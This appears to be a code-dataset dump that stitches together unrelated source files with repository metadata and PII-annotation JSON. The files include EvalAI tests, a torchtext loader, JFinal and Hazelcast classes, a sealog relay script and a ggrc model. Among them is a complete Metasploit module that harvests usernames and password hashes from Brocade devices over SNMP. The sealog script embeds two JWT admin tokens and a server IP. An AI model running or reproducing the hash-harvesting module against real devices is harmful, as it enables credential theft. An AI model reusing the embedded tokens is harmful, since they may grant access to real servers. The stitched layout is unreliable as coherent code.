            team_name="Test Challenge Host Team", created_by=self.user
        )
        self.participant_team = ParticipantTeam.objects.create(
            team_name="Participant Team for Challenge", created_by=self.user1
        )
        self.participant = Participant.objects.create(
            user=self.user1,
            status=Participant.SELF,
            team=self.participant_team,
        )
        # Challenge is currently running: started 2 days ago, ends tomorrow.
        self.challenge = Challenge.objects.create(
            title="Test Challenge",
            description="Description for test challenge",
            terms_and_conditions="Terms and conditions for test challenge",
            submission_guidelines="Submission guidelines for test challenge",
            creator=self.challenge_host_team,
            start_date=timezone.now() - timedelta(days=2),
            end_date=timezone.now() + timedelta(days=1),
            published=False,
            enable_forum=True,
            anonymous_leaderboard=False,
        )
        # Ensure the media directory exists; ignore "already exists".
        try:
            os.makedirs("/tmp/evalai")
        except OSError:
            pass
        # Redirect uploaded files (test annotation) into the temp media root.
        with self.settings(MEDIA_ROOT="/tmp/evalai"):
            self.challenge_phase = ChallengePhase.objects.create(
                name="Challenge Phase",
                description="Description for Challenge Phase",
                leaderboard_public=False,
                is_public=False,
                start_date=timezone.now() - timedelta(days=2),
                end_date=timezone.now() + timedelta(days=1),
                challenge=self.challenge,
                test_annotation=SimpleUploadedFile(
                    "test_sample_file.txt",
                    b"Dummy file content",
                    content_type="text/plain",
                ),
            )
        self.submission = Submission.objects.create(
            participant_team=self.participant_team,
            challenge_phase=self.challenge_phase,
            created_by=self.challenge_host_team.created_by,
            status="submitted",
            input_file=self.challenge_phase.test_annotation,
            method_name="Test Method",
            method_description="Test Description",
            project_url="http://testserver/",
            publication_url="http://testserver/",
            is_public=True,
        )
        self.client.force_authenticate(user=self.user)

    def tearDown(self):
        # Remove the temp media root created in setUp.
        shutil.rmtree("/tmp/evalai")
class MockRequest(object):
    """Bare-bones stand-in for a Django request object.

    The admin actions exercised below only receive the request positionally
    and do not appear to inspect it, so no attributes are needed here.
    """
    pass
# Shared request instance passed to the admin actions under test.
request = MockRequest()
class SubmissionAdminTest(BaseAPITestClass):
    """
    Test case for re-running submissions from admin
    """

    def setUp(self):
        super(SubmissionAdminTest, self).setUp()
        self.app_admin = SubmissionAdmin(Submission, AdminSite())

    def test_submit_job_to_worker(self):
        # Re-running a finished submission should flip it back to "submitted".
        Submission.objects.filter(status=self.submission.status).update(
            status="finished"
        )
        queryset = Submission.objects.filter(status="finished")
        self.app_admin.submit_job_to_worker(request, queryset)
        self.assertEqual(
            Submission.objects.filter(status="submitted").count(), 1
        )

    def test_make_submission_public(self):
        # make all submissions private before test
        Submission.objects.filter(is_public=self.submission.is_public).update(
            is_public=False
        )
        queryset = Submission.objects.filter(is_public=False)
        self.app_admin.make_submission_public(request, queryset)
        self.assertEqual(Submission.objects.filter(is_public=True).count(), 1)

    def test_make_submission_private(self):
        # make all submissions public before test
        Submission.objects.filter(is_public=False).update(
            is_public=True
        )
        queryset = Submission.objects.filter(is_public=True)
        self.app_admin.make_submission_private(request, queryset)
        self.assertEqual(Submission.objects.filter(is_public=False).count(), 1)
|
Python
|
BSD-3-Clause
|
Mukul2000/EvalAI/tests/unit/jobs/test_admin.py
|
8c7576bb-32ea-4f54-97f9-1fb8958cdb66
|
[{"tag": "EMAIL", "value": "user1@test.com", "start": 1086, "end": 1100, "context": " username=\"someuser1\",\n email=\"user1@test.com\",\n password=\"secret_password1\",\n "}, {"tag": "USERNAME", "value": "someuser", "start": 767, "end": 775, "context": "user = User.objects.create(\n username=\"someuser\",\n email=\"user@test.com\",\n "}, {"tag": "USERNAME", "value": "someuser1", "start": 1055, "end": 1064, "context": "ser1 = User.objects.create(\n username=\"someuser1\",\n email=\"user1@test.com\",\n "}, {"tag": "EMAIL", "value": "user@test.com", "start": 936, "end": 949, "context": "bjects.create(\n user=self.user, email=\"user@test.com\", primary=True, verified=True\n )\n\n "}, {"tag": "PASSWORD", "value": "secret_password1", "start": 1125, "end": 1141, "context": " email=\"user1@test.com\",\n password=\"secret_password1\",\n )\n\n EmailAddress.objects.create("}, {"tag": "EMAIL", "value": "user@test.com", "start": 797, "end": 810, "context": " username=\"someuser\",\n email=\"user@test.com\",\n password=\"secret_password\",\n "}, {"tag": "PASSWORD", "value": "secret_password", "start": 835, "end": 850, "context": " email=\"user@test.com\",\n password=\"secret_password\",\n )\n\n EmailAddress.objects.create("}, {"tag": "EMAIL", "value": "user1@test.com", "start": 1240, "end": 1254, "context": "(\n user=self.user1,\n email=\"user1@test.com\",\n primary=True,\n verified="}]
|
[{"tag": "EMAIL", "value": "user1@test.com", "start": 1086, "end": 1100, "context": " username=\"someuser1\",\n email=\"user1@test.com\",\n password=\"secret_password1\",\n "}, {"tag": "USERNAME", "value": "someuser", "start": 767, "end": 775, "context": "user = User.objects.create(\n username=\"someuser\",\n email=\"user@test.com\",\n "}, {"tag": "USERNAME", "value": "someuser1", "start": 1055, "end": 1064, "context": "ser1 = User.objects.create(\n username=\"someuser1\",\n email=\"user1@test.com\",\n "}, {"tag": "EMAIL", "value": "user@test.com", "start": 936, "end": 949, "context": "bjects.create(\n user=self.user, email=\"user@test.com\", primary=True, verified=True\n )\n\n "}, {"tag": "PASSWORD", "value": "secret_password1", "start": 1125, "end": 1141, "context": " email=\"user1@test.com\",\n password=\"secret_password1\",\n )\n\n EmailAddress.objects.create("}, {"tag": "EMAIL", "value": "user@test.com", "start": 797, "end": 810, "context": " username=\"someuser\",\n email=\"user@test.com\",\n password=\"secret_password\",\n "}, {"tag": "PASSWORD", "value": "secret_password", "start": 835, "end": 850, "context": " email=\"user@test.com\",\n password=\"secret_password\",\n )\n\n EmailAddress.objects.create("}, {"tag": "EMAIL", "value": "user1@test.com", "start": 1240, "end": 1254, "context": "(\n user=self.user1,\n email=\"user1@test.com\",\n primary=True,\n verified="}]
|
import os
from typing import Union, Tuple
from torchtext._internal.module_utils import is_module_available
from torchtext.data.datasets_utils import (
_wrap_split_argument,
_create_dataset_directory,
)
if is_module_available("torchdata"):
from torchdata.datapipes.iter import FileOpener, GDriveReader, IterableWrapper
URL = "https://drive.google.com/uc?export=download&id=0Bz8a_Dbh9QhbaW12WVVZS2drcnM"
MD5 = "fe39f8b653cada45afd5792e0f0e8f9b"
NUM_LINES = {
"train": 3600000,
"test": 400000,
}
_PATH = "amazon_review_polarity_csv.tar.gz"
_EXTRACTED_FILES = {
"train": os.path.join("amazon_review_polarity_csv", "train.csv"),
"test": os.path.join("amazon_review_polarity_csv", "test.csv"),
}
DATASET_NAME = "AmazonReviewPolarity"
@_create_dataset_directory(dataset_name=DATASET_NAME)
@_wrap_split_argument(("train", "test"))
def AmazonReviewPolarity(root: str, split: Union[Tuple[str], str]):
"""AmazonReviewPolarity Dataset
For additional details refer to https://arxiv.org/abs/1509.01626
Number of lines per split:
- train: 3600000
- test: 400000
Args:
root: Directory where the datasets are saved. Default: os.path.expanduser('~/.torchtext/cache')
split: split or splits to be returned. Can be a string or tuple of strings. Default: (`train`, `test`)
:returns: DataPipe that yields tuple of label (1 to 2) and text containing the review title and text
:rtype: (int, str)
"""
# TODO Remove this after removing conditional dependency
if not is_module_available("torchdata"):
raise ModuleNotFoundError(
"Package `torchdata` not found. Please install following instructions at `https://github.com/pytorch/data`"
)
url_dp = IterableWrapper([URL])
cache_compressed_dp = url_dp.on_disk_cache(
filepath_fn=lambda x: os.path.join(root, _PATH),
hash_dict={os.path.join(root, _PATH): MD5},
hash_type="md5",
)
cache_compressed_dp = GDriveReader(cache_compressed_dp).end_caching(mode="wb", same_filepath_fn=True)
cache_decompressed_dp = cache_compressed_dp.on_disk_cache(
filepath_fn=lambda x: os.path.join(root, _EXTRACTED_FILES[split])
)
cache_decompressed_dp = (
FileOpener(cache_decompressed_dp, mode="b").read_from_tar().filter(lambda x: _EXTRACTED_FILES[split] in x[0])
)
cache_decompressed_dp = cache_decompressed_dp.end_caching(mode="wb", same_filepath_fn=True)
data_dp = FileOpener(cache_decompressed_dp, encoding="utf-8")
return data_dp.parse_csv().map(fn=lambda t: (int(t[0]), " ".join(t[1:])))
|
Python
|
BSD-3-Clause
|
abhinavarora/text/torchtext/datasets/amazonreviewpolarity.py
|
ab9240e5-2736-4857-ac7c-fa9769d730c3
|
[]
|
[]
|
/**
* Copyright (c) 2011-2021, James Zhan 詹波 (jfinal@126.com).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.jfinal.kit;
import java.util.HashMap;
import java.util.Map;
import com.jfinal.json.Json;
/**
* Ret 用于返回值封装,也用于服务端与客户端的 json 数据通信
*
* <pre>
* 一、主要应用场景:
* 1:业务层需要返回多个返回值,例如要返回业务状态以及数据
* 2:renderJson(ret) 响应 json 数据给客户端
*
* 二、实例
* 1:服务端
* Ret ret = service.justDoIt(paras);
* renderJson(ret);
*
* 2:javascript 客户端 ajax 回调函数通常这么用:
* success: function(ret) {
* if(ret.state == "ok") {
* ...
* }
*
* if (ret.state == "fail") {
* ...
* }
* }
*
* 3:普通应用程序通常这么用:
* String json = HttpKit.readData(getRequest());
* Ret ret = FastJson.getJson().parse(json, Ret.class);
* if (ret.isOk()) {
* ...
* }
*
* if (ret.isFail()) {
* ...
* }
*
* 三、定制 Ret
* 1:将状态字段名由 "state" 改为 "success",将状态值 "ok" 改为 true、"fail" 改为 false
* CPI.setRetState("success", true, false);
*
* 2:将状态字段名由 "state" 改为 "code",将状态值 "ok" 改为 200、"fail" 改为 500
* CPI.setRetState("code", 200, 500);
*
* 3:将消息字段名由 "msg" 改为 "message"
* CPI.setRetMsg("message")
* </pre>
*/
@SuppressWarnings({"rawtypes", "unchecked"})
public class Ret extends HashMap {
private static final long serialVersionUID = -3021472182023759198L;
static String STATE = "state";
static Object STATE_OK = "ok";
static Object STATE_FAIL = "fail";
static String MSG = "msg";
public Ret() {
}
public static Ret by(Object key, Object value) {
return new Ret().set(key, value);
}
public static Ret create(Object key, Object value) {
return new Ret().set(key, value);
}
public static Ret create() {
return new Ret();
}
public static Ret ok() {
return new Ret().setOk();
}
public static Ret ok(Object key, Object value) {
return ok().set(key, value);
}
public static Ret ok(String msg) {
return ok().set(MSG, msg);
}
public static Ret fail() {
return new Ret().setFail();
}
public static Ret fail(Object key, Object value) {
return fail().set(key, value);
}
public static Ret fail(String msg) {
return fail().set(MSG, msg);
}
public Ret setOk() {
super.put(STATE, STATE_OK);
return this;
}
public Ret setFail() {
super.put(STATE, STATE_FAIL);
return this;
}
public boolean isOk() {
Object state = get(STATE);
if (STATE_OK.equals(state)) {
return true;
}
if (STATE_FAIL.equals(state)) {
return false;
}
throw new IllegalStateException("调用 isOk() 之前,必须先调用 ok()、fail() 或者 setOk()、setFail() 方法");
}
public boolean isFail() {
Object state = get(STATE);
if (STATE_FAIL.equals(state)) {
return true;
}
if (STATE_OK.equals(state)) {
return false;
}
throw new IllegalStateException("调用 isFail() 之前,必须先调用 ok()、fail() 或者 setOk()、setFail() 方法");
}
public Ret set(Object key, Object value) {
super.put(key, value);
return this;
}
public Ret setIfNotBlank(Object key, String value) {
if (StrKit.notBlank(value)) {
set(key, value);
}
return this;
}
public Ret setIfNotNull(Object key, Object value) {
if (value != null) {
set(key, value);
}
return this;
}
public Ret set(Map map) {
super.putAll(map);
return this;
}
public Ret set(Ret ret) {
super.putAll(ret);
return this;
}
public Ret delete(Object key) {
super.remove(key);
return this;
}
public <T> T getAs(Object key) {
return (T)get(key);
}
public String getStr(Object key) {
Object s = get(key);
return s != null ? s.toString() : null;
}
public Integer getInt(Object key) {
Number n = (Number)get(key);
return n != null ? n.intValue() : null;
}
public Long getLong(Object key) {
Number n = (Number)get(key);
return n != null ? n.longValue() : null;
}
public Double getDouble(Object key) {
Number n = (Number)get(key);
return n != null ? n.doubleValue() : null;
}
public Float getFloat(Object key) {
Number n = (Number)get(key);
return n != null ? n.floatValue() : null;
}
public Number getNumber(Object key) {
return (Number)get(key);
}
public Boolean getBoolean(Object key) {
return (Boolean)get(key);
}
/**
* key 存在,并且 value 不为 null
*/
public boolean notNull(Object key) {
return get(key) != null;
}
/**
* key 不存在,或者 key 存在但 value 为null
*/
public boolean isNull(Object key) {
return get(key) == null;
}
/**
* key 存在,并且 value 为 true,则返回 true
*/
public boolean isTrue(Object key) {
Object value = get(key);
return (value instanceof Boolean && ((Boolean)value == true));
}
/**
* key 存在,并且 value 为 false,则返回 true
*/
public boolean isFalse(Object key) {
Object value = get(key);
return (value instanceof Boolean && ((Boolean)value == false));
}
public String toJson() {
return Json.getJson().toJson(this);
}
public boolean equals(Object ret) {
return ret instanceof Ret && super.equals(ret);
}
}
|
Java
|
Apache-2.0
|
Sople/jfinal/src/main/java/com/jfinal/kit/Ret.java
|
c4789b83-4ae5-4709-950d-eb736ba0dea3
|
[{"tag": "NAME", "value": "James Zhan", "start": 33, "end": 43, "context": "/**\r\n * Copyright (c) 2011-2021, James Zhan \u8a79\u6ce2 (jfinal@126.com).\r\n *\r\n * Licensed under the A"}, {"tag": "EMAIL", "value": "jfinal@126.com", "start": 48, "end": 62, "context": "/**\r\n * Copyright (c) 2011-2021, James Zhan \u8a79\u6ce2 (jfinal@126.com).\r\n *\r\n * Licensed under the Apache License, Vers"}]
|
[{"tag": "NAME", "value": "James Zhan", "start": 33, "end": 43, "context": "/**\r\n * Copyright (c) 2011-2021, James Zhan \u8a79\u6ce2 (jfinal@126.com).\r\n *\r\n * Licensed under the A"}, {"tag": "EMAIL", "value": "jfinal@126.com", "start": 48, "end": 62, "context": "/**\r\n * Copyright (c) 2011-2021, James Zhan \u8a79\u6ce2 (jfinal@126.com).\r\n *\r\n * Licensed under the Apache License, Vers"}]
|
/*
* Copyright (c) 2008-2020, Hazelcast, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hazelcast.client.impl.protocol.codec;
import com.hazelcast.client.impl.protocol.ClientMessage;
import com.hazelcast.client.impl.protocol.Generated;
import com.hazelcast.client.impl.protocol.codec.builtin.*;
import com.hazelcast.client.impl.protocol.codec.custom.*;
import javax.annotation.Nullable;
import static com.hazelcast.client.impl.protocol.ClientMessage.*;
import static com.hazelcast.client.impl.protocol.codec.builtin.FixedSizeTypesCodec.*;
/*
* This file is auto-generated by the Hazelcast Client Protocol Code Generator.
* To change this file, edit the templates or the protocol
* definitions on the https://github.com/hazelcast/hazelcast-client-protocol
* and regenerate it.
*/
/**
* Checks the lock for the specified key.If the lock is acquired then returns true, else returns false.
*/
@Generated("306071f9db7b2ab1e92edc63a77973c7")
public final class MapIsLockedCodec {
//hex: 0x011200
public static final int REQUEST_MESSAGE_TYPE = 70144;
//hex: 0x011201
public static final int RESPONSE_MESSAGE_TYPE = 70145;
private static final int REQUEST_INITIAL_FRAME_SIZE = PARTITION_ID_FIELD_OFFSET + INT_SIZE_IN_BYTES;
private static final int RESPONSE_RESPONSE_FIELD_OFFSET = RESPONSE_BACKUP_ACKS_FIELD_OFFSET + BYTE_SIZE_IN_BYTES;
private static final int RESPONSE_INITIAL_FRAME_SIZE = RESPONSE_RESPONSE_FIELD_OFFSET + BOOLEAN_SIZE_IN_BYTES;
private MapIsLockedCodec() {
}
@edu.umd.cs.findbugs.annotations.SuppressFBWarnings({"URF_UNREAD_PUBLIC_OR_PROTECTED_FIELD"})
public static class RequestParameters {
/**
* name of map
*/
public java.lang.String name;
/**
* Key for the map entry to check if it is locked.
*/
public com.hazelcast.internal.serialization.Data key;
}
public static ClientMessage encodeRequest(java.lang.String name, com.hazelcast.internal.serialization.Data key) {
ClientMessage clientMessage = ClientMessage.createForEncode();
clientMessage.setRetryable(true);
clientMessage.setOperationName("Map.IsLocked");
ClientMessage.Frame initialFrame = new ClientMessage.Frame(new byte[REQUEST_INITIAL_FRAME_SIZE], UNFRAGMENTED_MESSAGE);
encodeInt(initialFrame.content, TYPE_FIELD_OFFSET, REQUEST_MESSAGE_TYPE);
encodeInt(initialFrame.content, PARTITION_ID_FIELD_OFFSET, -1);
clientMessage.add(initialFrame);
StringCodec.encode(clientMessage, name);
DataCodec.encode(clientMessage, key);
return clientMessage;
}
public static MapIsLockedCodec.RequestParameters decodeRequest(ClientMessage clientMessage) {
ClientMessage.ForwardFrameIterator iterator = clientMessage.frameIterator();
RequestParameters request = new RequestParameters();
//empty initial frame
iterator.next();
request.name = StringCodec.decode(iterator);
request.key = DataCodec.decode(iterator);
return request;
}
@edu.umd.cs.findbugs.annotations.SuppressFBWarnings({"URF_UNREAD_PUBLIC_OR_PROTECTED_FIELD"})
public static class ResponseParameters {
/**
* Returns true if the entry is locked, otherwise returns false
*/
public boolean response;
}
public static ClientMessage encodeResponse(boolean response) {
ClientMessage clientMessage = ClientMessage.createForEncode();
ClientMessage.Frame initialFrame = new ClientMessage.Frame(new byte[RESPONSE_INITIAL_FRAME_SIZE], UNFRAGMENTED_MESSAGE);
encodeInt(initialFrame.content, TYPE_FIELD_OFFSET, RESPONSE_MESSAGE_TYPE);
encodeBoolean(initialFrame.content, RESPONSE_RESPONSE_FIELD_OFFSET, response);
clientMessage.add(initialFrame);
return clientMessage;
}
public static MapIsLockedCodec.ResponseParameters decodeResponse(ClientMessage clientMessage) {
ClientMessage.ForwardFrameIterator iterator = clientMessage.frameIterator();
ResponseParameters response = new ResponseParameters();
ClientMessage.Frame initialFrame = iterator.next();
response.response = decodeBoolean(initialFrame.content, RESPONSE_RESPONSE_FIELD_OFFSET);
return response;
}
}
|
Java
|
Apache-2.0
|
Andu033/hazelcast/hazelcast/src/main/java/com/hazelcast/client/impl/protocol/codec/MapIsLockedCodec.java
|
da5db584-ec62-4776-9d0f-73963c5594a4
|
[{"tag": "API_KEY", "value": "306071f9db7b2ab1e92edc63a77973c7", "start": 1464, "end": 1496, "context": "returns true, else returns false.\n */\n@Generated(\"306071f9db7b2ab1e92edc63a77973c7\")\npublic final class MapIsLockedCodec {\n //hex"}]
|
[{"tag": "KEY", "value": "306071f9db7b2ab1e92edc63a77973c7", "start": 1464, "end": 1496, "context": "returns true, else returns false.\n */\n@Generated(\"306071f9db7b2ab1e92edc63a77973c7\")\npublic final class MapIsLockedCodec {\n //hex"}]
|
#!/usr/bin/env python3
# still in development
#
import asyncio
import websockets
import json
import requests
eventsAPIPath = '/api/v1/events'
localServerIP = '0.0.0.0'
localServerAPIPort = '8000'
localServerWSPort = '8000'
localServerPath = '/sealog-server'
localToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'
localClientWSID = 'localSealogReceive'
remoteServerIP = '162.243.201.175'
remoteServerAPIPort = '80'
remoteServerWSPort = '8000'
remoteServerPath = '/sealog-server'
remoteToken = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk"
remoteClientWSID = 'remoteSealogReceive'
hello = {
'type': 'hello',
'id': remoteClientWSID,
'auth': {
'headers': {
'authorization': remoteToken
}
},
'version': '2',
'subs': ['/ws/status/newEvents']
}
ping = {
'type':'ping',
'id':remoteClientWSID
}
localHeaders = {'authorization': localToken}
remoteHeaders = {'authorization': remoteToken}
async def eventlog():
try:
async with websockets.connect('ws://' + remoteServerIP + ':' + remoteServerWSPort) as websocket:
await websocket.send(json.dumps(hello))
while(True):
event = await websocket.recv()
eventObj = json.loads(event)
print("eventObj:", eventObj)
if eventObj['type'] and eventObj['type'] == 'ping':
await websocket.send(json.dumps(ping))
elif eventObj['type'] and eventObj['type'] == 'pub':
r = requests.post('http://' + localServerIP + ':' + localServerAPIPort + localServerPath + eventsAPIPath, headers=localHeaders, data = json.dumps(eventObj['message']))
print(r.text)
### end of repeat
except Exception as error:
print(error)
asyncio.get_event_loop().run_until_complete(eventlog())
|
Python
|
MIT
|
OceanDataTools/sealog-server/misc/sealog_repeater_receive.py
|
c0ff97b6-b374-42cb-9473-9bec3a0b42c8
|
[{"tag": "IP_ADDRESS", "value": "162.243.201.175", "start": 571, "end": 586, "context": "entWSID = 'localSealogReceive'\n\nremoteServerIP = '162.243.201.175'\nremoteServerAPIPort = '80'\nremoteServerWSPort = "}, {"tag": "API_KEY", "value": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc", "start": 276, "end": 511, "context": "\nlocalServerPath = '/sealog-server'\nlocalToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'\nlocalClientWSID = 'localSealogReceive'\n\nremoteSe"}, {"tag": "API_KEY", "value": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk", "start": 694, "end": 929, "context": "emoteServerPath = '/sealog-server'\nremoteToken = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk\"\nremoteClientWSID = 'remoteSealogReceive'\n\nhello "}, {"tag": "IP_ADDRESS", "value": "0.0.0.0", "start": 163, "end": 170, "context": "ventsAPIPath = '/api/v1/events'\n\nlocalServerIP = '0.0.0.0'\nlocalServerAPIPort = '8000'\nlocalServerWSPort = "}]
|
[{"tag": "IP_ADDRESS", "value": "162.243.201.175", "start": 571, "end": 586, "context": "entWSID = 'localSealogReceive'\n\nremoteServerIP = '162.243.201.175'\nremoteServerAPIPort = '80'\nremoteServerWSPort = "}, {"tag": "KEY", "value": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc", "start": 276, "end": 511, "context": "\nlocalServerPath = '/sealog-server'\nlocalToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'\nlocalClientWSID = 'localSealogReceive'\n\nremoteSe"}, {"tag": "KEY", "value": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk", "start": 694, "end": 929, "context": "emoteServerPath = '/sealog-server'\nremoteToken = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk\"\nremoteClientWSID = 'remoteSealogReceive'\n\nhello "}, {"tag": "IP_ADDRESS", "value": "0.0.0.0", "start": 163, "end": 170, "context": "ventsAPIPath = '/api/v1/events'\n\nlocalServerIP = '0.0.0.0'\nlocalServerAPIPort = '8000'\nlocalServerWSPort = "}]
|
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Brocade Password Hash Enumeration',
'Description' => %q{
This module extracts password hashes from certain Brocade load
balancer devices.
},
'References' =>
[
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
],
'Author' => ['Deral "PercentX" Heiland'],
'License' => MSF_LICENSE
)
end
def run_host(ip)
begin
snmp = connect_snmp
if snmp.get_value('sysDescr.0') =~ /Brocade/
@users = []
snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row|
row.each { |val| @users << val.value.to_s }
end
@hashes = []
snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row|
row.each { |val| @hashes << val.value.to_s }
end
print_good("#{ip} - Found user and password hashes:")
end
credinfo = ""
@users.each_index do |i|
credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
print_good("#{@users[i]}:#{@hashes[i]}")
end
#Woot we got loot.
loot_name = "brocade.hashes"
loot_type = "text/plain"
loot_filename = "brocade_hashes.txt"
loot_desc = "Brodace username and password hashes"
p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)
print_status("Credentials saved: #{p}")
rescue ::SNMP::UnsupportedVersion
rescue ::SNMP::RequestTimeout
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end
end
|
Ruby
|
Apache-2.0
|
4kux/metasploit-framework/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
|
9dec7ead-762c-458f-9dd8-b4e30b229acb
|
[]
|
[]
|
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: david@reciprocitylabs.com
# Maintained By: david@reciprocitylabs.com
import re
from sqlalchemy.orm import validates
from ggrc import db
from ggrc import settings
from ggrc.models.computed_property import computed_property
from ggrc.models.context import HasOwnContext
from ggrc.models.exceptions import ValidationError
from ggrc.models.mixins import deferred, Base, CustomAttributable
from ggrc.models.reflection import PublishOnly
from ggrc.models.relationship import Relatable
from ggrc.models.utils import validate_option
class Person(CustomAttributable, HasOwnContext, Relatable, Base, db.Model):
__tablename__ = 'people'
email = deferred(db.Column(db.String, nullable=False), 'Person')
name = deferred(db.Column(db.String), 'Person')
language_id = deferred(db.Column(db.Integer), 'Person')
company = deferred(db.Column(db.String), 'Person')
object_people = db.relationship(
'ObjectPerson', backref='person', cascade='all, delete-orphan')
object_owners = db.relationship(
'ObjectOwner', backref='person', cascade='all, delete-orphan')
language = db.relationship(
'Option',
primaryjoin='and_(foreign(Person.language_id) == Option.id, '
'Option.role == "person_language")',
uselist=False,
)
@staticmethod
def _extra_table_args(cls):
return (
db.Index('ix_people_name_email', 'name', 'email'),
db.Index('uq_people_email', 'email', unique=True),
)
_fulltext_attrs = [
'company',
'email',
'name',
]
_publish_attrs = [
'company',
'email',
'language',
'name',
PublishOnly('object_people'),
PublishOnly('system_wide_role'),
]
_sanitize_html = [
'company',
'name',
]
_include_links = []
